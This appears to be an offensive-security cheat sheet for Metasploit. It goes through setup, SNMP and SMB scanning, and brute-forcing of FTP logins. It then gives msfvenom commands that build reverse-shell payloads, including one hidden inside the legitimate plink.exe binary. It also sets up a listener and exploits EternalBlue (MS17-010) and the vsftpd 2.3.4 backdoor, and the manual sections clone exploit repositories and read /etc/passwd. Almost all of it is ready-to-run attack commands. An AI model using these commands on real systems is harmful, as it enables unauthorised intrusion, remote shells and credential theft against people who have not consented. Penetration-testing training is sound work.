Exploitation

Metasploit

# Start Metasploit
systemctl start postgresql
systemctl enable postgresql
msfdb init
msfconsole

# Metasploit Modules
Auxiliary:    Modules for enumeration, scanning, fuzzing, sniffing, etc.
Exploits:     Code to exploit the vulnerability and deliver the payload.
Payloads:     The code that executes on the victim.
Encoders:     Encode the payloads to another form.
Post:         Post-exploitation modules.
Nops:         Add NOP bytes.
Evasion:      Modules for evasion.

# Metasploit Commands
help
show {all|exploits|payloads|auxiliary}
search vsftpd
search type:exploit smb
info {ModuleName}
use {ModuleName}
show info | show options
set {Variable} {value}
exploit

# Ex1 SNMP service enumeration
use auxiliary/scanner/snmp/snmp_enum
show info
show options
set rhosts 192.168.1.244
run

# Ex2 SMB version scanning
use auxiliary/scanner/smb/smb_version
info | options
set rhosts 192.168.1.1-254
run

# Ex3 Test FTP anonymous login
use auxiliary/scanner/ftp/ftp_login
info | options
set pass_file /root/pass.txt
set blank_passwords true
set rhosts 192.168.1.0/24
set user_file /root/user.txt
run

Client-Side Attacks

Standalone Payload

# Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 -f exe > file.exe

# Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 -f elf > file.elf

# Python
msfvenom -p python/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 -o file.py

# Embedded Inside File
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.15 LPORT=4444 -f exe -x /usr/share/windows-resources/binaries/plink.exe -o embedded.exe

Setup Listener

msfconsole
> use exploit/multi/handler
> set PAYLOAD windows/meterpreter/reverse_tcp
> show options
> set LHOST 10.0.2.15
> set LPORT 4444
> exploit

Windows Service-Side Attack

Exploit for MS17-010

use exploit/windows/smb/ms17_010_eternalblue
show options | show info
set rhosts 192.168.1.19
show payloads
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.114
exploit

Manual Exploit for MS17-010

https://github.com/3ndG4me/AutoBlue-MS17-010
cd AutoBlue-MS17-010
cd shellcode
./shell_prep.sh
cd ..
./listener_prep.sh
python eternalblue_exploit7.py 192.168.1.4 shellcode/sc_all.bin

Linux Service-Side Exploit

Exploit for vsftpd 2.3.4

use exploit/unix/ftp/vsftpd_234_backdoor
show options | show info
set rhosts 192.168.1.115
show payloads
set payload cmd/unix/interact
exploit

Manual Exploit for vsftpd 2.3.4

git clone https://github.com/In2econd/vsftpd-2.3.4-exploit
cd vsftpd-2.3.4-exploit
python3 vsftpd_234_exploit.py 192.168.1.115 21 whoami
python3 vsftpd_234_exploit.py 192.168.1.115 21 "cat /etc/passwd"
